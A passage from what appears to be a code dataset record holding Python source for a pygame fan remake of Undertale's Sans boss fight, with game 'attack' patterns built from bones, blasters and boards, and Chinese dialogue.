2]\n\n def zjj(screen):\n angle = random.randint(-140, -40)\n 
d = random.randint(10, 200)\n blasters.append(GasterBlaster(pos=[player.pos[0] + math.cos(math.\n radians(angle)) * d, player.pos[1] + math.sin(math.radians(\n angle)) * d], angle=angle - 180, time1=0, time2=20, width=50))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, 
BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-5": "import pygame\nimport time as time_\nimport random\nimport os\nfrom pygame.locals import *\nfrom math import sin, cos, pi\nfrom sys import exit\n# ---------------------------\nfrom unzip import *\nunzip()\n# ---------------------------\nfrom others import *\nfrom gaster_blaster import *\nfrom board import *\nfrom bone import *\nfrom sans import *\nfrom player import *\nfrom functions import *\n# ----------------------------------------------------------------\n'''初始化'''\nos.environ[\"SDL_VIDEO_WINDOW_POS\"] = \"100,100\"\npygame.init()\nif FULL_SCREEN:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\nelse:\n display = pygame.display.set_mode(SCREEN_SIZE)\nscreen = pygame.Surface(SCREEN_SIZE).convert_alpha()\nmask_surface_blue = pygame.Surface(SCREEN_SIZE).convert_alpha() # 蓝色攻击的mask\nmask_surface_orange = pygame.Surface(SCREEN_SIZE).convert_alpha() # 橙色攻击的mask\nmask_surface_normal = pygame.Surface(SCREEN_SIZE).convert_alpha() # 普通攻击的mask\npygame.display.set_caption(\"UPPERTALE\") #标题\npygame.display.set_icon(pygame.image.load(\"res/icon-32.png\")) #图标\n\nfps = pygame.time.Clock() # 帧数计时器\nframes = 60\n\n# -----------------------------------\n'''因为需要修改全局变量\n所以不得不写在主文件里的函数'''\ndef players_turn(text):\n def tmp():\n global is_players_turn, battle_text, shown_index\n is_players_turn = True\n battle_text = text\n shown_index = 0\n bones.clear()\n blasters.clear()\n boards.clear()\n attacks.append(tmp)\n\ndef set_turn_time(time):\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\ndef unshake(screen):\n global screen_shaking\n screen_shaking = False\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\ndef start_testing():\n attacks.clear()\n\n# -------------------------------------\n'''回合'''\n# 吟唱\n@add_attack\ndef yinchang_1():\n global BOX_POS, 
BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n # 测试区开始\n pass\n # 测试区结束\n sans.say(\"准备好了?\")\n\n# 开头杀\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7],\n speed=[0, -5],\n direction=UP,\n time1=8,\n time2=40,\n length=1000,\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],\n speed=[0, 0],\n direction=UP,\n time1=200,\n time2=48,\n length=1000,\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],\n speed=[0, 5],\n direction=UP,\n time1=8,\n time2=248,\n length=1000,\n type_=1\n )\n )\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[0] - BOX_POS[0]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (player.pos[0] - BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, 5],\n direction=LEFT,\n time1=8,\n time2=30,\n length=0,\n type_=2\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, 0],\n direction=LEFT,\n time1=150,\n time2=38,\n length=40,\n type_=2\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, -5],\n direction=LEFT,\n time1=8,\n time2=188,\n 
length=40,\n type_=2\n )\n )\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(\n Bone(\n pos=BOX_POS,\n length=40 + sin(_ / 20) * 40,\n direction=UP,\n speed=[7, 0],\n time1=1000,\n time2=_,\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + 25 + (sin(_ / 20) * 40) + 60],\n length=1000,\n direction=UP,\n speed=[7, 0],\n time1=1000,\n time2=_,\n )\n )\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say(\"只是第一个回合而已,何必用尽全力?\")\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef zjj_1():\n set_turn_time(60)\n global BOX_POS, BOX_SIZE\n BOX_POS = [200, 230]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n\n@add_attack\ndef zjj_2():\n set_turn_time(11 * 100)\n def zjj(screen):\n angle = random.randint(240, 300)\n blasters.append(GasterBlaster(\n pos=[\n player.pos[0] + math.cos(math.radians(angle)) * 200,\n player.pos[1] + math.sin(math.radians(angle)) * 200],\n angle=angle - 180,\n time1=10,\n time2=30,\n width=30,\n color=BLUE\n ))\n for _ in range(10):\n tasks.append(Task(zjj, _ * 100))\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 20, BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[2, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-2, 0],\n type_=2\n ))\n\n \n bones.append(\n 
Bone(\n pos=[BOX_POS[0] - 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[2, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-2, 0],\n type_=1\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[4, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[4, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=BOX_POS,\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60 + 16,\n speed=[4, 0],\n type_=1,\n color=BLUE\n ))\n \n@add_attack\ndef orange_bone():\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 0))\n tasks.append(Task(stop_spinning, 180))\n tasks.append(Task(lambda screen:set_screen_angle(180), 181))\n tasks.append(Task(start_spinning, 520))\n tasks.append(Task(stop_spinning, 700))\n tasks.append(Task(lambda screen:set_screen_angle(0), 701))\n set_turn_time(700)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n 
player.direction = UP\n player.falling_speed = 10\n tasks.append(Task(shake,\n (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[1] - BOX_POS[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=10,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[8, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + 30 + 16],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[8, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=BOX_POS,\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60 + 8,\n speed=[8, 0],\n type_=1,\n color=ORANGE\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(\n pos=[x, BOX_POS[1]],\n time1=10,\n time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10],\n length=0,\n direction=DOWN,\n color=BLUE\n ))\n bones.append(Bone(\n pos=[x, BOX_POS[1]],\n time1=10,\n time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10],\n length=BOX_SIZE[1],\n direction=DOWN,\n color=BLUE\n ))\n tasks.append(Task(shake,_ * 100 + 10))\n tasks.append(Task(unshake,_ * 100 + 15))\n tasks.append(Task(lambda screen : slam_sound.play(),\n _ * 100 + 15))\n \n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(\n 
pos=[BOX_POS[0], y],\n time1=10,\n time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10],\n length=0,\n direction=RIGHT,\n color=ORANGE\n ))\n bones.append(Bone(\n pos=[BOX_POS[0], y],\n time1=10,\n time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10],\n length=BOX_SIZE[0],\n direction=RIGHT,\n color=ORANGE\n ))\n\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2\n ))\n\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], y + 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0], y + 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=1\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n \n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1]],\n angle=0,\n time1=10,\n time2=70,\n time3=10,\n width=70\n )\n )\n\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1]],\n angle=0,\n 
time1=10,\n time2=70,\n time3=10,\n width=30\n )\n )\n\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=1000,\n time2=100,\n speed=[0, 0],\n type_=1\n )\n )\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] - 8],\n length=5,\n direction=DOWN,\n time1=1000,\n time2=100,\n speed=[0, 0],\n type_=2\n )\n )\n boards.append(\n Board(\n pos=[BOX_POS[0],BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40,\n speed=[1, 0],\n time1=BOX_SIZE[0],\n time2=100,\n direction=UP\n )\n )\n\n for _ in range(0, 20, 4):\n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 40 - 25],\n length=1000,\n direction=UP,\n time1=BOX_SIZE[0] // 4,\n time2=150 + (_ * 30),\n speed=[-4, 0]\n )\n )\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen:set_screen_angle(0), 682))\n\n@add_attack\ndef board_3():\n set_turn_time(100)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n tasks.append(Task(shake,\n (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[0] - BOX_POS[0]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (player.pos[0] - BOX_POS[0]) // 10))\n \n tasks.append(Task(shake, 60))\n tasks.append(Task(unshake, 65))\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 10],\n angle=90,\n time1=10,\n time2=50,\n time3=0,\n width=50\n )\n )\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n 
sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n\n@add_attack\ndef board_2_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1]],\n angle=0,\n time1=10,\n time2=70,\n time3=10,\n width=70\n )\n )\n \n tasks.append(Task(shake, 250))\n tasks.append(Task(unshake, 255))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1] - 20],\n angle=0,\n time1=10,\n time2=70,\n time3=250,\n width=70\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=0,\n speed=[-2, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=100,\n speed=[-1.5, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=200,\n speed=[-1, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 30],\n time1=1000,\n time2=300,\n speed=[-3, 0],\n length=80\n )\n )\n \n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=400,\n time2=100,\n speed=[0, 0],\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=1000,\n time2=500,\n speed=[0, 0],\n type_=1\n )\n )\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef bone_lid1():\n set_turn_time(70)\n global BOX_SIZE, 
BOX_POS\n BOX_POS = [200, 240]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[1]],\n time1=1000,\n length=130,\n angle=45,\n speed=[5, 0, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[1] + BOX_SIZE[1]],\n time1=1000,\n length=130,\n angle=-45,\n speed=[-5, 0, 0, 0]\n )\n )\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[1] - BOX_POS[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] - 20, BOX_POS[1]],\n time1=1000,\n length=130,\n angle=-45,\n speed=[5, 0, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1]],\n time1=1000,\n length=130,\n angle=45,\n speed=[-5, 0, 0, 0]\n )\n )\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 60,\n length=260,\n angle=-45,\n speed=[0, 2, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 60,\n length=260,\n angle=45,\n speed=[0, -2, 0, 0]\n )\n )\n \n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 
20],\n time1=1000,\n time2=_ * 60 + 30,\n length=260,\n angle=45,\n speed=[0, 2, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 60 + 30,\n length=260,\n angle=-45,\n speed=[0, -2, 0, 0]\n )\n )\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say(\"好了,我也累了,不如我们休息一下?\")\n\n@add_attack\ndef mercy2():\n sans.say(\"这也是一个改过自新的机会,\")\n\n@add_attack\ndef mercy3():\n sans.say(\"赶紧按下饶恕,\")\n\n@add_attack\ndef mercy4():\n sans.headtype = SANS_NO_EYES\n sans.say(\"否则你绝对不想见到下一个回合\")\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n \nplayers_turn(\"* ...\")\n@add_attack\ndef before_flash():\n sans.say(\"好吧,看来你已经做出了自己的选择。\")\n \n@add_attack\ndef flash_round():\n set_turn_time(10)\n global blackout\n flash_sound.play()\n blackout = True\n bones.clear()\n blasters.clear()\n boards.clear()\n def flash(screen):\n global blackout\n blackout = False\n flash_sound.play()\n pygame.mixer.music.unpause()\n tasks.append(Task(flash, 10))\n \ndef flash_round_1():\n set_turn_time(150)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n player.type = BLUE_SOUL\n player.direction = DOWN\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n 100000]\n direction = random.randint(0, 1)\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 30, BOX_POS[1] + BOX_SIZE[1] - 30],\n angle=0,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 30, BOX_POS[1] - 30],\n angle=0,\n time1=0,\n time2=30,\n time3=60,\n width=90\n )\n )\n if direction:\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=60,\n width=90\n 
)\n )\n else:\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=60,\n width=90\n )\n )\n for angle in range(0, 360, 10):\n bones.append(RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2 + cos(radians(angle)) * BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2 + 25 + sin(radians(angle)) * BOX_SIZE[1] / 2],\n length=25,\n angle=angle,\n time1=150\n )\n )\n if angle % 30 == 0:\n bones.append(RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2 + 25],\n length=40,\n angle=angle,\n speed=[0, 0, 0, 5],\n time1=130,\n time2=20\n )\n )\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n def zjj(screen):\n angle = random.randint(-140, -40)\n d = random.randint(10, 200)\n blasters.append(GasterBlaster(\n pos=[\n player.pos[0] + math.cos(math.radians(angle)) * d,\n player.pos[1] + math.sin(math.radians(angle)) * d],\n angle=angle - 180,\n time1=0,\n time2=20,\n width=50\n ))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n \ndef flash_round_4():\n set_turn_time(100)\n global 
